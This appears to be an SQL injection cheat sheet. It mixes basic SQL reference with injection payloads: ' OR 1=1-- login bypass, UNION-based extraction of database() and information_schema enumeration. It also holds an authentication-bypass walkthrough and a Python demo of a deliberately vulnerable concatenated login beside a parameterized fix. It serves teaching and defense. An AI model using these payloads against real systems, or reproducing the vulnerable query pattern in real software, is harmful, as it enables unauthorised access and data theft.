1. Basic SQL Commands
SELECT column1, column2 FROM table_name;
SELECT * FROM users; -- Selects all columns
INSERT INTO table_name (col1, col2) VALUES ('val1', 'val2');
UPDATE table_name SET column1 = 'value' WHERE id = 1;
DELETE FROM table_name WHERE condition;
CREATE DATABASE mydb; -- Create new database
CREATE TABLE users (id INT, username VARCHAR(255)); -- Create new table
DROP TABLE users; -- Delete a table
DROP DATABASE mydb; -- Delete a database
2. WHERE Clause & Logical Operators
SELECT * FROM users WHERE username = 'admin';
SELECT * FROM users WHERE username = 'admin' AND password = '123';
SELECT * FROM users WHERE username = 'admin' OR 1=1; -- Always true
Logical Operators:
AND: both conditions must be true
OR: at least one condition must be true
NOT: reverses the result
Comparison Operators:
= equal
!= or <> not equal
> greater than
< less than
>=, <= greater than or equal, less than or equal
Order of Precedence:
- SQL evaluates NOT > AND > OR by default. Use parentheses () to change evaluation order.
3. Comments
Used to ignore the rest of a SQL line (important for injection):
-- (double dash, MySQL and others)
# (hash, MySQL)
/* comment */ (multi-line, less common in injection)
4. Functions You’ll Use Often
database(); -- Current DB name
version(); -- DB version
user(); -- Current DB user
length(string); -- Returns length of string
substr(string,1,1); -- Substring (start at position 1, length 1)
left(string, n); -- First n characters
right(string, n); -- Last n characters
ascii(char); -- ASCII value of character
concat(str1,str2); -- Joins strings
group_concat(col); -- Joins rows into one string
5. UNION Operator
Used to join two SELECT queries:
1 UNION SELECT 1,2,3;
Rules:
- Number of columns must match
- Data types must match (usually)
- UNION by default removes duplicates; use UNION ALL to include all rows
6. information_schema (Essential for Enumeration)
SELECT table_name FROM information_schema.tables WHERE table_schema = 'db';
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';
SELECT schema_name FROM information_schema.schemata; -- List all databases
Key Tables:
information_schema.tables: all tables
information_schema.columns: all columns
information_schema.schemata: all databases
information_schema.statistics: index information
information_schema.processlist: running queries (privileged)
7. LIKE and Wildcards
LIKE 'a%' -- starts with a
LIKE '%a' -- ends with a
LIKE '%a%' -- contains a
NOT LIKE 'a%' -- does not start with a
Wildcards:
% matches zero or more characters
_ matches a single character
8. LIMIT Clause
LIMIT 1; -- Only return one result
LIMIT 0,5; -- Skip 0, return 5 rows
9. ORDER BY Clause
ORDER BY 1 DESC; -- Sort by first column, descending
ORDER BY username ASC; -- Sort alphabetically
10. Combining Conditions in Injection
' OR 1=1-- -- Login bypass
' AND 1=2-- -- False statement
' UNION SELECT 1,2,database()-- -- Data extraction
11. Understanding the SQL Engine’s Logic Flow
- SQL evaluates conditions from left to right, applying operator precedence rules.
- It stops evaluating once the outcome of the WHERE clause is already determined (short-circuit logic).
- Injection payloads often cut the original logic short and force a true condition.
- Use quotes, comments, and operator awareness to shape query execution.
Example:
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
-- Injection: username input is admin'-- so the rest of the line, including the password check, is commented out and ignored
This makes the query:
SELECT * FROM users WHERE username = 'admin'-- ' AND password = 'abc';
Result: Authentication bypass.
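As an added example (not part of the original cheat sheet), the concatenated template above beside its parameterized fix, run against a constructed in-memory SQLite table; the function names and sample rows are assumptions for this demo:

```python
import sqlite3


def make_db():
    """Constructed sample data (not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "o'brien", "pass2")])
    conn.commit()
    return conn


def vulnerable_login(conn, user, pw):
    """Builds the query by string concatenation, like the $user/$pass template
    above. Quotes and comment markers in the input become SQL syntax."""
    query = ("SELECT id FROM users WHERE username = '" + user +
             "' AND password = '" + pw + "'")
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.OperationalError:
        # A stray quote breaks the statement: a syntax error on user input is
        # the classic symptom of unparameterized SQL and worth logging server-side.
        return None


def safe_login(conn, user, pw):
    """Parameterized query: the driver binds the values, so a quote or '--'
    in the input is matched literally and never changes the query's logic."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # admin'-- comments out the password check in the concatenated version only
    print(vulnerable_login(db, "admin'--", "anything"))  # True
    print(safe_login(db, "admin'--", "anything"))        # False
    # a legitimate apostrophe works with binding but breaks the concatenated query
    print(safe_login(db, "o'brien", "pass2"))            # True
    print(vulnerable_login(db, "o'brien", "pass2"))      # None (syntax error)
```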
Pro Tips:
- Always close quotes properly in your payload.
- Use -- to comment out the rest of the query.
- Use UNION to leak data to the page.
- Use information_schema to map the DB.
- Understand how SQL interprets your injection — it’s all about logic flow and syntax control.
